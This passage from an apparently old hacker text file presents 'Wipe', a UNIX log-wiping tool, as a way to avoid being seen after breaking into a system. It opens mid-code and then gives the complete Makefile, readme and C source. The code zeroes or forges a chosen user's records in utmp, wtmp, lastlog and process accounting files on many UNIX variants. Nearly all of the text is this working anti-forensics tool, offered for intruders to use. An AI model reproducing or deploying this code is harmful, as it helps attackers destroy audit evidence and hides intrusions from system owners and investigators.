interface address] host\n"); exit(1); } If you need more, start coding...... :) -- || Hiding your presence under lots of OS... -- ---------------------------------------- Allrite, now you want not to be seen in the logs...Then you can do the following: edit the logs manually (sheesh, only if you are desperate), or use a program to do it for you (that's for normal people)... Anyways, the BIG problem is finding a program to work for a multitude of Operating Systems... now, there are lots of programs that claim that they can do it, but i've seen only one program, really and that's WIPE ... -------------------------------Makefile--------------------------------------- # # This is the Makefile for wipe. # CC=gcc CFLAGS = -O3 default: @echo @echo Wipe v0.01 ! @echo @echo "Usage: 'make ' where System types are:" @echo @echo " linux freebsd sunos4 solaris2 ultrix" @echo " aix irix digital bsdi netbsd hpux" @echo # # Linux : Tested on various 1.2.x, 1.3.x and pre 2.0 systems. # Accounting seems to be still in development. # linux: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -DNO_ACCT -o wipe wipe.c # # FreeBSD : Tested on 2.1.0. Accounting file is at /var/account/acct. # freebsd: wipe.c $(CC) $(CFLAGS) -DACCT_FILE=\"/var/account/acct\" -o wipe wipe.c # # SunOS 4.1.x : Standard BSD type setup. # sunos4: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -o wipe wipe.c # # Solaris 2.x : Ugh, System V. Has UTMPX. # solaris2: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -DHAVE_UTMPX -o wipe wipe.c # # Ultrix : # ultrix: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -o wipe wipe.c # # AIX : # aix: wipe.c $(CC) $(CFLAGS) -o wipe wipe.c # # IRIX : # irix: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -DHAVE_UTMPX -o wipe wipe.c # # Digital/OSF : # digital: wipe.c $(CC) $(CFLAGS) -DHAVE_LASTLOG_H -o wipe wipe.c # # BSDI : # bsdi: wipe.c $(CC) $(CFLAGS) -o wipe wipe.c # # NetBSD : # netbsd: wipe.c $(CC) $(CFLAGS) -o wipe wipe.c # # HP-UX : # hpux: wipe.c $(CC) $(CFLAGS) -o wipe wipe.c clean: rm -f wipe ------------------------------HOWTO----------------------------------------- Wipe v1.00 ========== Type 'make' to view the possible system variants. Then type 'make [systype]' to compile for your system. -------------------------------readme-------------------------------------- Wipe v1.00 =========== Wipe is an all-in-one UNIX log wiper. Wipe removes log entries from UTMP, WTMP, LASTLOG and ACCT entries. It will compile on virtually anything and wipe the logs CORRECTLY for that variant of UNIX. Something that always fucks me, is having different versions of code for different variants of UNIX systems. Wipe solves this problem due to it's wide portability across many platforms. Wipe is simple to use, after compiling just type 'wipe' for info. The Crawler. -------------------------------wipe.c-------------------------------------- /* * Wipe v1.00. * * Written by The Crawler. * * Selectively wipe system logs. * * Wipes logs on, but not including, Linux, FreeBSD, Sunos 4.x, Solaris 2.x, * Ultrix, AIX, IRIX, Digital UNIX, BSDI, NetBSD, HP/UX. */ #include #include #include #ifndef NO_ACCT #include #endif #include #include #include #include #include #include #include #include #include #ifdef HAVE_LASTLOG_H #include #endif #ifdef HAVE_UTMPX #include #endif /* * Try to use the paths out of the include files. * But if we can't find any, revert to the defaults. */ #ifndef UTMP_FILE #ifdef _PATH_UTMP #define UTMP_FILE _PATH_UTMP #else #define UTMP_FILE "/var/adm/utmp" #endif #endif #ifndef WTMP_FILE #ifdef _PATH_WTMP #define WTMP_FILE _PATH_WTMP #else #define WTMP_FILE "/var/adm/wtmp" #endif #endif #ifndef LASTLOG_FILE #ifdef _PATH_LASTLOG #define LASTLOG_FILE _PATH_LASTLOG #else #define LASTLOG_FILE "/var/adm/lastlog" #endif #endif #ifndef ACCT_FILE #define ACCT_FILE "/var/adm/pacct" #endif #ifdef HAVE_UTMPX #ifndef UTMPX_FILE #define UTMPX_FILE "/var/adm/utmpx" #endif #ifndef WTMPX_FILE #define WTMPX_FILE "/var/adm/wtmpx" #endif #endif /* HAVE_UTMPX */ #define BUFFSIZE 8192 /* * This function will copy the src file to the dst file. */ void copy_file(char *src, char *dst) { int fd1, fd2; int n; char buf[BUFFSIZE]; if ( (fd1 = open(src, O_RDONLY)) < 0 ) { fprintf(stderr, "ERROR: Opening %s during copy.\n", src); return; } if ( (fd2 = open(dst, O_WRONLY | O_CREAT | O_TRUNC)) < 0 ) { fprintf(stderr, "ERROR: Creating %s during copy.\n", dst); return; } while ( (n = read(fd1, buf, BUFFSIZE)) > 0) if (write(fd2, buf, n) != n) { fprintf(stderr, "ERROR: Write error during copy.\n"); return; } if (n < 0) { fprintf(stderr, "ERROR: Read error during copy.\n"); return; } close(fd1); close(fd2); } /* * UTMP editing. */ void wipe_utmp(char *who, char *line) { int fd1; struct utmp ut; printf("Patching %s .... ", UTMP_FILE); fflush(stdout); /* * Open the utmp file. */ if ( (fd1 = open(UTMP_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", UTMP_FILE); return; } /* * Copy utmp file excluding relevent entries. */ while ( read(fd1, &ut, sizeof(ut)) > 0) if ( !strncmp(ut.ut_name, who, strlen(who)) ) if (!line || (line && !strncmp(ut.ut_line, line, strlen(line)))) { bzero((char *) &ut, sizeof(ut)); lseek(fd1, (int) -sizeof(ut), SEEK_CUR); write(fd1, &ut, sizeof(ut)); } close(fd1); printf("Done.\n"); } /* * UTMPX editing if supported. */ #ifdef HAVE_UTMPX void wipe_utmpx(char *who, char *line) { int fd1; struct utmpx utx; printf("Patching %s .... ", UTMPX_FILE); fflush(stdout); /* * Open the utmp file and temporary file. */ if ( (fd1 = open(UTMPX_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", UTMPX_FILE); return; } while ( (read(fd1, &utx, sizeof(utx)) ) > 0) if ( !strncmp(utx.ut_name, who, strlen(who)) ) if (!line || (line && !strncmp(utx.ut_line, line, strlen(line)))) { bzero((char *) &utx, sizeof(utx)); lseek(fd1, (int) -sizeof(utx), SEEK_CUR); write(fd1, &utx, sizeof(utx)); } close(fd1); printf("Done.\n"); } #endif /* * WTMP editing. */ void wipe_wtmp(char *who, char *line) { int fd1; struct utmp ut; printf("Patching %s .... ", WTMP_FILE); fflush(stdout); /* * Open the wtmp file and temporary file. */ if ( (fd1 = open(WTMP_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", WTMP_FILE); return; } /* * Determine offset of last relevent entry. */ lseek(fd1, (long) -(sizeof(ut)), SEEK_END); while ( (read (fd1, &ut, sizeof(ut))) > 0) { if (!strncmp(ut.ut_name, who, strlen(who))) if (!line || (line && !strncmp(ut.ut_line, line, strlen(line)))) { bzero((char *) &ut, sizeof(ut)); lseek(fd1, (long) -(sizeof(ut)), SEEK_CUR); write(fd1, &ut, sizeof(ut)); break; } lseek(fd1, (long) -(sizeof(ut) * 2), SEEK_CUR); } close(fd1); printf("Done.\n"); } /* * WTMPX editing if supported. */ #ifdef HAVE_UTMPX void wipe_wtmpx(char *who, char *line) { int fd1; struct utmpx utx; printf("Patching %s .... ", WTMPX_FILE); fflush(stdout); /* * Open the utmp file and temporary file. */ if ( (fd1 = open(WTMPX_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", WTMPX_FILE); return; } /* * Determine offset of last relevent entry. */ lseek(fd1, (long) -(sizeof(utx)), SEEK_END); while ( (read (fd1, &utx, sizeof(utx))) > 0) { if (!strncmp(utx.ut_name, who, strlen(who))) if (!line || (line && !strncmp(utx.ut_line, line, strlen(line)))) { bzero((char *) &utx, sizeof(utx)); lseek(fd1, (long) -(sizeof(utx)), SEEK_CUR); write(fd1, &utx, sizeof(utx)); break; } lseek(fd1, (int) -(sizeof(utx) * 2), SEEK_CUR); } close(fd1); printf("Done.\n"); } #endif /* * LASTLOG editing. */ void wipe_lastlog(char *who, char *line, char *timestr, char *host) { int fd1; struct lastlog ll; struct passwd *pwd; struct tm *tm; char str[4]; printf("Patching %s .... ", LASTLOG_FILE); fflush(stdout); tm = (struct tm *) malloc( sizeof(struct tm) ); /* * Open the lastlog file. */ if ( (fd1 = open(LASTLOG_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", LASTLOG_FILE); return; } if ( (pwd = getpwnam(who)) == NULL) { fprintf(stderr, "ERROR: Can't find user in passwd.\n"); return; } lseek(fd1, (long) pwd->pw_uid * sizeof(struct lastlog), 0); bzero((char *) &ll, sizeof(ll)); if (line) strncpy(ll.ll_line, line, strlen(line)); if (timestr) { /* YYMMddhhmm */ if (strlen(timestr) != 10) { fprintf(stderr, "ERROR: Time format is YYMMddhhmm.\n"); return; } /* * Extract Times. */ str[2] = 0; str[0] = timestr[0]; str[1] = timestr[1]; tm->tm_year = atoi(str); str[0] = timestr[2]; str[1] = timestr[3]; tm->tm_mon = atoi(str) - 1; str[0] = timestr[4]; str[1] = timestr[5]; tm->tm_mday = atoi(str); str[0] = timestr[6]; str[1] = timestr[7]; tm->tm_hour = atoi(str); str[0] = timestr[8]; str[1] = timestr[9]; tm->tm_min = atoi(str); tm->tm_sec = 0; ll.ll_time = mktime(tm); } if (host) strncpy(ll.ll_host, host, sizeof(ll.ll_host)); write(fd1, (char *) &ll, sizeof(ll)); close(fd1); printf("Done.\n"); } #ifndef NO_ACCT /* * ACCOUNT editing. */ void wipe_acct(char *who, char *line) { int fd1, fd2; struct acct ac; char ttyn[50]; struct passwd *pwd; struct stat sbuf; char *tmpf; printf("Patching %s .... ", ACCT_FILE); fflush(stdout); /* * Open the acct file and temporary file. */ if ( (fd1 = open(ACCT_FILE, O_RDONLY)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", ACCT_FILE); return; } /* * Grab a unique temporary filename. */ tmpf = tmpnam((char *) NULL); if ( (fd2 = open(tmpf, O_WRONLY | O_CREAT | O_TRUNC, 600)) < 0 ) { fprintf(stderr, "ERROR: Opening tmp ACCT file\n"); return; } if ( (pwd = getpwnam(who)) == NULL) { fprintf(stderr, "ERROR: Can't find user in passwd.\n"); return; } /* * Determine tty's device number */ strcpy(ttyn, "/dev/"); strcat(ttyn, line); if (stat(ttyn, &sbuf) < 0) { fprintf(stderr, "ERROR: Determining tty device number.\n"); return; } while ( read(fd1, &ac, sizeof(ac)) > 0 ) { if ( !(ac.ac_uid == pwd->pw_uid && ac.ac_tty == sbuf.st_rdev) ) write(fd2, &ac, sizeof(ac)); } close(fd1); close(fd2); copy_file(tmpf, ACCT_FILE); if ( unlink(tmpf) < 0 ) { fprintf(stderr, "ERROR: Unlinking tmp WTMP file.\n"); return; } printf("Done.\n"); } #endif void usage() { printf("USAGE: wipe [ u|w|l|a ] ...options...\n"); printf("\n"); printf("UTMP editing:\n"); printf(" Erase all usernames : wipe u [username]\n"); printf(" Erase one username on tty: wipe u [username] [tty]\n"); printf("\n"); printf("WTMP editing:\n"); printf(" Erase last entry for user : wipe w [username]\n"); printf(" Erase last entry on tty : wipe w [username] [tty]\n"); printf("\n"); printf("LASTLOG editing:\n"); printf(" Blank lastlog for user : wipe l [username]\n"); printf(" Alter lastlog entry : wipe l [username] [tty] [time] [host]\n"); printf(" Where [time] is in the format [YYMMddhhmm]\n"); printf("\n"); #ifndef NO_ACCT printf("ACCT editing:\n"); printf(" Erase acct entries on tty : wipe a [username] [tty]\n"); #endif exit(1); } int main(int argc, char *argv[]) { char c; if (argc < 3) usage(); /* * First character of first argument determines which file to edit. */ c = toupper(argv[1][0]); /* * UTMP editing. */ switch (c) { /* UTMP */ case 'U' : if (argc == 3) wipe_utmp(argv[2], (char *) NULL); if (argc ==4) wipe_utmp(argv[2], argv[3]); #ifdef HAVE_UTMPX if (argc == 3) wipe_utmpx(argv[2], (char *) NULL); if (argc == 4) wipe_utmpx(argv[2], argv[3]); #endif break; /* WTMP */ case 'W' : if (argc == 3) wipe_wtmp(argv[2], (char *) NULL); if (argc == 4) wipe_wtmp(argv[2], argv[3]); #ifdef HAVE_UTMPX if (argc == 3) wipe_wtmpx(argv[2], (char *) NULL); if (argc == 4) wipe_wtmpx(argv[2], argv[3]); #endif break; /* LASTLOG */ case 'L' : if (argc == 3) wipe_lastlog(argv[2], (char *) NULL, (char *) NULL, (char *) NULL); if (argc == 4) wipe_lastlog(argv[2], argv[3], (char *) NULL, (char *) NULL); if (argc == 5) wipe_lastlog(argv[2], argv[3], argv[4], (char *) NULL); if (argc == 6) wipe_lastlog(argv[2], argv[3], argv[4], argv[5]); break; #ifndef NO_ACCT /* ACCT */ case 'A' : if (argc != 4) usage(); wipe_acct(argv[2], argv[3]); break; #endif } return(0); }